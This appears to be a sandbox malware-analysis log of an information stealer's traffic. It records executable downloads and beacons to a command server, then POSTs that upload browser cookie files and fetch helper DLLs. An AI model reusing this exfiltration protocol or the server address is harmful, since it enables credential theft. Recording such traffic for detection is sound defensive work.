06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 21:43:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 21:43:13 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 21:43:14 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 46 33 46 42 37 41 45 33 39 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 2d 2d 0d 0a Data Ascii: ------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="hwid"9F3FB7AE39294266498721------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="build"doma------BAFCGIJDAFBKFIECBGCA--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKECFCFBGCAAKEGIJDHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 4b 45 43 46 43 46 42 47 43 41 41 4b 45 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 33 31 35 64 32 64 38 35 63 39 63 34 30 32 63 66 38 30 38 33 62 64 35 32 33 30 63 38 65 33 62 38 32 31 30 32 30 38 31 35 35 37 34 37 62 30 33 34 37 30 66 32 62 66 64 34 36 38 34 33 36 38 64 31 39 63 66 64 31 38 31 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 45 43 46 43 46 42 47 43 41 41 4b 45 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 45 43 46 43 46 42 47 43 41 41 4b 45 47 49 4a 44 2d 2d 0d 0a Data Ascii: ------AEBKECFCFBGCAAKEGIJDContent-Disposition: form-data; name="token"d315d2d85c9c402cf8083bd5230c8e3b8210208155747b03470f2bfd4684368d19cfd181------AEBKECFCFBGCAAKEGIJDContent-Disposition: form-data; name="message"browsers------AEBKECFCFBGCAAKEGIJD--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJKHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 33 31 35 64 32 64 38 35 63 39 63 34 30 32 63 66 38 30 38 33 62 64 35 32 33 30 63 38 65 33 62 38 32 31 30 32 30 38 31 35 35 37 34 37 62 30 33 34 37 30 66 32 62 66 64 34 36 38 34 33 36 38 64 31 39 63 66 64 31 38 31 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 2d 2d 0d 0a Data Ascii: ------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="token"d315d2d85c9c402cf8083bd5230c8e3b8210208155747b03470f2bfd4684368d19cfd181------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="message"plugins------DAKFIDHDGIEGCAKFIIJK--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDGDGIIDGCFIDHDHDHHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 33 31 35 64 32 64 38 35 63 39 63 34 30 32 63 66 38 30 38 33 62 64 35 32 33 30 63 38 65 33 62 38 32 31 30 32 30 38 31 35 35 37 34 37 62 30 33 34 37 30 66 32 62 66 64 34 36 38 34 33 36 38 64 31 39 63 66 64 31 38 31 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 2d 2d 0d 0a Data Ascii: ------AFHDGDGIIDGCFIDHDHDHContent-Disposition: form-data; name="token"d315d2d85c9c402cf8083bd5230c8e3b8210208155747b03470f2bfd4684368d19cfd181------AFHDGDGIIDGCFIDHDHDHContent-Disposition: form-data; name="message"fplugins------AFHDGDGIIDGCFIDHDHDH--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKJKFHCAEGDHIDGDHDAHost: 185.215.113.37Content-Length: 6347Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJJEGDBFIIDGCAKJEBKHost: 185.215.113.37Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 33 31 35 64 32 64 38 35 63 39 63 34 30 32 63 66 38 30 38 33 62 64 35 32 33 30 63 38 65 33 62 38 32 31 30 32 30 38 31 35 35 37 34 37 62 30 33 34 37 30 66 32 62 66 64 34 36 38 34 33 36 38 64 31 39 63 66 64 31 38 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4f 44 67 79 4e 6a 41 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 54 41 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 7a 41 33 4e 44 59 77 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 55 4e 34 51 58 52 6d 55 56 4e 32 62 56 6c 45 61 45 35 70 53 43 31 46 53 7a 52 78 61 33 5a 78 65 6d 78 6c 53 54 4a 73 59 6d 4a 7a 4e 6b 35 35 53 6b 64 73 63 6d 68 6c 5a 32 31 4d 4e 6e 52 49 4f 56 4e 7a 61 58 4a 59 4e 30 5a 6d 53 45 68 72 54 45 5a 76 56 6c 4a 49 59 31 6f 35 63 6b 52 70 63 7a 4e 56 61 54 64 58 64 79 30 74 56 55 5a 54 57 6d 46 58 55 31 56 55 55 56 70 45 57 46 42 34 55 45 31 75 53 54 42 75 61 58 4e 43 62 6e 70 43 63 46 46 72 59 31 56 78 62 6d 67 32 56 44 42 4b 5a 44 4e 36 65 43 31 44 53 46 49 35 61 43 31 52 63 6a 46 59 64 44 56 71 4f 46 64 4e 62 6b 46 44 51 32 4e 78 4d 55 64 4d 57 6c 39 45 4e 31 56 36 56 6e 42 47 52 57 67 74 51 55 78 30 51 6a 64 56 61 58 5a 6a 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 4b 2d 2d 0d 0a Data Ascii: ------HIJJEGDBFIIDGCAKJEBKContent-Disposition: form-data; name="token"d315d2d85c9c402cf8083bd5230c8e3b8210208155747b03470f2bfd4684368d19cfd181------HIJJEGDBFIIDGCAKJEBKContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------HIJJEGDBFIIDGCAKJEBKContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwODgyNjAJMVBfSkFSCTIwMjMtMTAtMDUtMTAKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMzA3NDYwCU5JRAk1MTE9RUN4QXRmUVN2bVlEaE5pSC1FSzRxa3ZxemxlS
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEBAFCBKFIDGCAKKKFHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 33 31 35 64 32 64 38 35 63 39 63 34 30 32 63 66 38 30 38 33 62 64 35 32 33 30 63 38 65 33 62 38 32 31 30 32 30 38 31 35 35 37 34 37 62 30 33 34 37 30 66 32 62 66 64 34 36 38 34 33 36 38 64 31 39 63 66 64 31 38 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 2d 2d 0d 0a Data Ascii: ------HIIEBAFCBKFIDGCAKKKFContent-Disposition: form-data; name="token"d315d2d85c9c402cf8083bd5230c8e3b8210208155747b03470f2bfd4684368d19cfd181------HIIEBAFCBKFIDGCAKKKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HIIEBAFCBKFIDGCAKKKFContent-Disposition: form-data; name="file"------HIIEBAFCBKFIDGCAKKKF--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIEGDBAEBFIIDHJJJEBHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 45 47 44 42 41 45 42 46 49 49 44 48 4a 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 33 31 35 64 32 64 38 35 63 39 63 34 30 32 63 66 38 30 38 33 62 64 35 32 33 30 63 38 65 33 62 38 32 31 30 32 30 38 31 35 35 37 34 37 62 30 33 34 37 30 66 32 62 66 64 34 36 38 34 33 36 38 64 31 39 63 66 64 31 38 31 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 47 44 42 41 45 42 46 49 49 44 48 4a 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 47 44 42 41 45 42 46 49 49 44 48 4a 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 47 44 42 41 45 42 46 49 49 44 48 4a 4a 4a 45 42 2d 2d 0d 0a Data Ascii: ------FIIEGDBAEBFIIDHJJJEBContent-Disposition: form-data; name="token"d315d2d85c9c402cf8083bd5230c8e3b8210208155747b03470f2bfd4684368d19cfd181------FIIEGDBAEBFIIDHJJJEBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FIIEGDBAEBFIIDHJJJEBContent-Disposition: form-data; name="file"------FIIEGDBAEBFIIDHJJJEB--
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
